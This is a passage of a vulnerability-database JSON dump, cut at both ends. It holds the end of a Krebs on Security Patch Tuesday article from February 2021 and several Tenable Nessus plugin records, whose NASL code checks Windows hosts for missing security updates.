non-Windows security updates are worth mentioning. Adobe today [released updates to fix at least 50 security holes in a range of products](<https://blogs.adobe.com/psirt/?p=1965>), including Photoshop and Reader. The Acrobat/Reader update tackles a critical zero-day flaw that [Adobe says](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>) is actively being exploited in the wild against Windows users, so if you have Adobe Acrobat or Reader installed, please make sure these programs are kept up to date.\n\nThere is also a zero-day flaw in **Google&#x27;s Chrome Web browser** (CVE-2021-21148) that is seeing active attacks. Chrome downloads security updates automatically, but users still need to restart the browser for the updates to fully take effect. If you&#x27;re a Chrome user and notice a red &quot;update&quot; prompt to the right of the address bar, it&#x27;s time to save your work and restart the browser.\n\nStandard reminder: While staying up-to-date on Windows patches is a must, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re less likely to pull your hair out when the odd buggy patch causes problems booting the system.\n\nSo do yourself a favor and backup your files before installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nKeep in mind that Windows 10 by default will automatically download and install updates on its own schedule. If you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAnd as always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "modified": "2021-02-09T22:37:19", "published": "2021-02-09T22:37:19", "id": "KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "href": "https://krebsonsecurity.com/2021/02/microsoft-patch-tuesday-february-2021-edition/", "type": "krebs", "title": "Microsoft Patch Tuesday, February 2021 Edition", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-04-01T06:16:20", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows kernel that allows a local attacker, via a\n specially crafted application, to bypass the Address\n Space Layout Randomization (ASLR) feature and retrieve\n the memory address of a kernel object. (CVE-2016-7214)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to execute\n arbitrary code in kernel mode. (CVE-2016-7215,\n CVE-2016-7246, CVE-2016-7255)\n\n - An information disclosure vulnerability exists in the\n bowser.sys kernel-mode driver due to improper handling\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to disclose\n sensitive information. (CVE-2016-7218)", "edition": 36, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-08T00:00:00", "title": "MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7246", "CVE-2016-7218", "CVE-2016-7214", "CVE-2016-7255", "CVE-2016-7215"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS16-135.NASL", "href": "https://www.tenable.com/plugins/nessus/94636", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94636);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:32\");\n\n script_cve_id(\n \"CVE-2016-7214\",\n \"CVE-2016-7215\",\n \"CVE-2016-7218\",\n \"CVE-2016-7246\",\n \"CVE-2016-7255\"\n );\n script_bugtraq_id(\n 93991,\n 94000,\n 94004,\n 94063,\n 94064\n );\n script_xref(name:\"MSFT\", value:\"MS16-135\");\n script_xref(name:\"MSKB\", value:\"3198234\");\n script_xref(name:\"MSKB\", value:\"3194371\");\n script_xref(name:\"MSKB\", value:\"3197867\");\n script_xref(name:\"MSKB\", value:\"3197868\");\n script_xref(name:\"MSKB\", value:\"3197873\");\n script_xref(name:\"MSKB\", value:\"3197874\");\n script_xref(name:\"MSKB\", value:\"3197876\");\n script_xref(name:\"MSKB\", value:\"3197877\");\n script_xref(name:\"MSKB\", value:\"3198585\");\n script_xref(name:\"MSKB\", value:\"3198586\");\n script_xref(name:\"MSKB\", value:\"3200970\");\n script_xref(name:\"IAVA\", value:\"2016-A-0322\");\n\n script_name(english:\"MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135)\");\n script_summary(english:\"Checks the version of ntoskrnl.exe or the installed rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows kernel that allows a local attacker, via a\n specially crafted application, to bypass the Address\n Space Layout Randomization (ASLR) feature and retrieve\n the memory address of a kernel object. (CVE-2016-7214)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to execute\n arbitrary code in kernel mode. (CVE-2016-7215,\n CVE-2016-7246, CVE-2016-7255)\n\n - An information disclosure vulnerability exists in the\n bowser.sys kernel-mode driver due to improper handling\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to disclose\n sensitive information. (CVE-2016-7218)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-135\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-135';\nkbs = make_list(\n '3198234',\n '3194371',\n '3197867',\n '3197868',\n '3197873',\n '3197874',\n '3197876',\n '3197877',\n '3198585',\n '3198586',\n '3200970'\n\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Vista / 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.24029\", min_version:\"6.0.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3198234\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"win32k.sys\", version:\"6.0.6002.19706\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3198234\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"bowser.sys\", version:\"6.0.6002.24021\", min_version:\"6.0.6002.23000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"3194371\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"bowser.sys\", version:\"6.0.6002.19698\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"3194371\") ||\n # 8.1 / 2012 R2\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197873, 3197874)) ||\n # 2012\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197876, 3197877)) ||\n # 7 / 2008 R2\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3197867, 3197868)) ||\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3198585)) ||\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3198586)) ||\n # 10 (1607)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date: \"11_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3200970))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-20T22:27:45", "description": "The remote Windows host is missing security update 4601354.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24083,\n CVE-2021-24088, CVE-2021-24093, CVE-2021-24094)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24106)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)", "edition": 7, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "title": "KB4601354: Windows 10 Version 1803 February 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24103", "CVE-2021-1722", "CVE-2021-24086", "CVE-2021-24079", "CVE-2021-24076", "CVE-2021-24102", "CVE-2021-24098", "CVE-2021-24106", "CVE-2021-1734", "CVE-2021-24077", "CVE-2021-1727", "CVE-2021-1732", "CVE-2021-1731", "CVE-2021-24080", "CVE-2021-24093", "CVE-2021-24074", "CVE-2021-1698", "CVE-2021-25195", "CVE-2021-24094", "CVE-2021-24088"], "modified": "2021-02-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601354.NASL", "href": "https://www.tenable.com/plugins/nessus/146339", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146339);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/19\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601354\");\n script_xref(name:\"MSFT\", value:\"MS21-4601354\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093\");\n\n script_name(english:\"KB4601354: Windows 10 Version 1803 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601354.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24083,\n CVE-2021-24088, CVE-2021-24093, CVE-2021-24094)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24106)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/topic/february-9-2021-kb4601354-os-build-17134-2026-04614869-9ce5-cc3b-655a-bc66eb7cb4b0\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dbcfd44b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601354.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601354');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601354])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-20T22:27:44", "description": "The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)", "edition": 7, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "title": "KB4601315: Windows 10 Version 1909 February 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24103", "CVE-2021-1722", "CVE-2021-24086", "CVE-2021-24079", "CVE-2021-24076", "CVE-2021-24084", "CVE-2021-24102", "CVE-2021-24098", "CVE-2021-24106", "CVE-2021-1734", "CVE-2021-24077", "CVE-2021-1727", "CVE-2021-1732", "CVE-2021-1731", "CVE-2021-24080", "CVE-2021-24093", "CVE-2021-24074", "CVE-2021-1698", "CVE-2021-25195", "CVE-2021-24081", "CVE-2021-24094", "CVE-2021-24091", "CVE-2021-24078", "CVE-2021-24088"], "modified": "2021-02-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601315.NASL", "href": "https://www.tenable.com/plugins/nessus/146326", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146326);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/19\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601315\");\n script_xref(name:\"MSFT\", value:\"MS21-4601315\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093\");\n\n script_name(english:\"KB4601315: Windows 10 Version 1909 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/topic/february-9-2021-kb4601315-os-build-18363-1377-bdd71d2f-6729-e22a-3150-64324e4ab954\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93fc3ad3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601315.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601315');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601315])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-20T22:27:45", "description": "The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24078,\n CVE-2021-24081, CVE-2021-24083, CVE-2021-24088,\n CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)", "edition": 7, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "title": "KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24103", "CVE-2021-1722", "CVE-2021-24086", "CVE-2021-24079", "CVE-2021-24076", "CVE-2021-24084", "CVE-2021-24102", "CVE-2021-24098", "CVE-2021-24106", "CVE-2021-1734", "CVE-2021-24077", "CVE-2021-1727", "CVE-2021-1732", "CVE-2021-1731", "CVE-2021-24080", "CVE-2021-24093", "CVE-2021-24074", "CVE-2021-24096", "CVE-2021-1698", "CVE-2021-25195", "CVE-2021-24081", 